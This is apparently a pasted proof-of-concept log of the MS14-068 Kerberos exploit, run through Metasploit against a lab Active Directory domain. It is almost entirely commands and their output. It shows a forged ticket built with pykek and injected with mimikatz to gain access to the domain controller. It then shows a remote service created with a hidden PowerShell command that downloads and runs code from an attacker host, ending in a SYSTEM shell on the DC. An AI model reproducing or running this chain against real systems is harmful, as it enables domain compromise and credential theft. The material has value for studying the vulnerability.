MS14-068 Metasploit PoC

Posted by a guest, Dec 5th, 2014
git clone https://github.com/bidord/pykek
echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts

[*] [2014.12.05-23:43:51] 172.16.80.100    web_delivery - Delivering Payload
[*] [2014.12.05-23:43:53] Sending stage (770048 bytes) to 172.16.80.100
[*] Meterpreter session 12 opened (172.16.80.225:4444 -> 172.16.80.100:57204) at 2014-12-05 23:44:12 +0000

20141205-23:44 - 192.168.153.129 exploit(payload_inject) > sessions -i 12
[*] Starting interaction with 12...

meterpreter > portfwd add -l 88 -p 88 -r 172.16.80.10
[*] Local TCP relay created: 0.0.0.0:88 <-> 172.16.80.10:88

python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066-1105
  [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
  [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!

meterpreter > getuid
Server username: METASPLOITABLE\User01
meterpreter > sysinfo
Computer        : MSFTS01
OS              : Windows 8.1 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Meterpreter     : x86/win32
meterpreter > shell
Process 4232 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32\WindowsPowerShell\v1.0>whoami /user
whoami /user

USER INFORMATION
----------------

User Name             SID                                          
===================== ==============================================
metasploitable\user01 S-1-5-21-2928836948-3642677517-2073454066-1105

C:\Windows\system32\WindowsPowerShell\v1.0>net use \\msfdc01\admin$
net use \\msfdc01\admin$
The password is invalid for \\msfdc01\admin$.

Enter the username for 'msfdc01': System error 1223 has occurred.

The operation was cancelled by the user.

c:\test>exit
meterpreter > cd c:/test
meterpreter > upload /root/TGT_user01@metasploitable.local.ccache c:/test/TGT_user01@metasploitable.local.ccache
[*] uploading  : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache
[*] uploaded   : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"kerberos::ptc TGT_user01@metasploitable.local.ccache" exit'
Process 3600 created.
Channel 3 created.
meterpreter > shell
Process 3948 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\test>net use \\msfdc01\admin$
net use \\msfdc01\admin$
The password is invalid for \\msfdc01\admin$.

Enter the username for 'msfdc01': System error 1223 has occurred.

The operation was cancelled by the user.


c:\test>klist
klist
'klist' is not recognized as an internal or external command,
operable program or batch file.

c:\test>mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit
mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 20 2014 01:35:45)
 .## ^ ##.  
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */


mimikatz(commandline) # kerberos::ptc TGT_user01@metasploitable.local.ccache

Principal : (01) : user01 ; @ METASPLOITABLE.LOCAL

Data 0
           Start/End/MaxRenew: 05/12/2014 23:42:03 ; 06/12/2014 09:41:58 ; 12/12/2014 23:41:58
           Service Name (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL
           Target Name  (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL
           Client Name  (01) : user01 ; @ METASPLOITABLE.LOCAL
           Flags 50a00000    : pre_authent ; renewable ; proxiable ; forwardable ;
           Session Key       : 0x00000017 - rc4_hmac_nt      
             d5c7022a905e9c71deed80c28940a27d
           Ticket            : 0x00000000 - null              ; kvno = 2        [...]
           * Injecting ticket : OK

mimikatz(commandline) # exit
Bye!

c:\test>net use \\msfdc01\admin$
net use \\msfdc01\admin$
The command completed successfully.


c:\test>sc \\msfdc01\ create test binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('ht^C
Terminate channel 4? [y/N]  n


c:\test>

c:\test>sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))"
sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))"
[SC] CreateService SUCCESS

c:\test>sc \\msfdc01\ start test_ptc
sc \\msfdc01\ start test_ptc
^Z
Background channel 4? [y/N]  y

meterpreter >
meterpreter > background
[*] Backgrounding session 12...
20141205-23:49 - 192.168.153.129 exploit(payload_inject) > sessions

Active sessions
===============

  Id  Type                   Information                      Connection
  --  ----                   -----------                      ----------
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ MSFDC01    172.16.80.225:4444 -> 172.16.80.10:60843 (172.16.80.10)
  12  meterpreter x86/win32  METASPLOITABLE\User01 @ MSFTS01  172.16.80.225:4444 -> 172.16.80.100:57204 (172.16.80.100)

20141205-23:49 - 192.168.153.129 exploit(payload_inject) >
[*] [2014.12.05-23:49:18] 172.16.80.10     web_delivery - Delivering Payload
[*] [2014.12.05-23:49:19] Sending stage (770048 bytes) to 172.16.80.10
[*] Meterpreter session 13 opened (172.16.80.225:4444 -> 172.16.80.10:60961) at 2014-12-05 23:49:35 +0000

20141205-23:50 - 192.168.153.129 exploit(payload_inject) > sessions -i 13
[*] Starting interaction with 13...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MSFDC01
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_GB
Meterpreter     : x86/win32